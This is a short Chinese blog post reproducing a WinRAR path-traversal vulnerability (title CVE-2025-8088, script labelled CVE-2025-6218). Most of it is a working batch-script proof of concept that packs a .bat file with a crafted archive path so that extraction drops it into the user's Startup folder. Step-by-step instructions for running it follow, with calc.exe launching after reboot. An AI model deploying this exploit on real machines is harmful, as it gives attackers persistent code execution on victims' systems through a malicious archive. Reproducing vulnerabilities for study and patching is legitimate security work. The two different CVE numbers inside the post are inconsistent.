CVE-2025-8088 WinRAR 路径穿越漏洞复现
WinRAR 版本 <= 7.11
@echo off
title CVE-2025-6218 POC
echo calc.exe > POC.bat
"C:\Program Files\WinRAR\WinRAR.exe" a -ap" \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" CVE-2025-6218.zip POC.bat
echo.
if errorlevel 1 (
echo [!] Failed to create POC.
) else (
echo [+] CVE-2025-6218.zip created successfully!
)
echo.
del POC.bat
pause
上面代码保存为.bat 后双击执行生成zip文件,然后用WinRAR解压(注意压缩文件需要放到桌面或者../../这样往回跳两级能到用户目录下的路径),POC.bat会被解压到启动目录。

重启后看效果,计算器应用会自动打开。

浙公网安备 33010602011771号